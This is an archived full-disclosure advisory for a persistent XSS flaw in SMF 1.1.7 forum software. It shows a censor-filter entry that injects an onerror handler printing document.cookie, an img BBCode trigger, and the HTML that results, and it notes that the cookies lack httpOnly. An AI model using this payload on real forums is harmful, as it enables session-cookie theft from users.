TUCoPS :: HP Unsorted S :: va2503.htm

SMF 1.1.7 Persistent XSS (requires permision to edit censor)
SMF 1.1.7 Persistent XSS (requires permision to edit censor)
SMF 1.1.7 Persistent XSS (requires permision to edit censor)



SMF 1.1.7 (simplemachines.org) XSS

Exploitation:

If you can modify the censor on a SMF forum, then you can make it
execute arbitrary JS code.
http://SMF.Forum.com/index.php?action=postsettings;sa=censor 

Just add the following entry:
http://www.test.xss/ => http://www.test-xss/" onerror="alert(document.cookie) 

And then write a post, modify your signature, or send a PM with the code:
[img]http://www.test.xss/[/img] 

And the HTML code generated will be..
src="http://www.test-xss/" onerror="alert(document.cookie)" 
alt="" border="0" />

Notes:
 - SMF is not using httpOnly cookies.
 - I'm going full disclosure with this because I've had bad
experiences with the SMF team when reporting vulnerabilities..

Greetings!!
-- Eduardo
http://www.sirdarckcat.net/ 

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH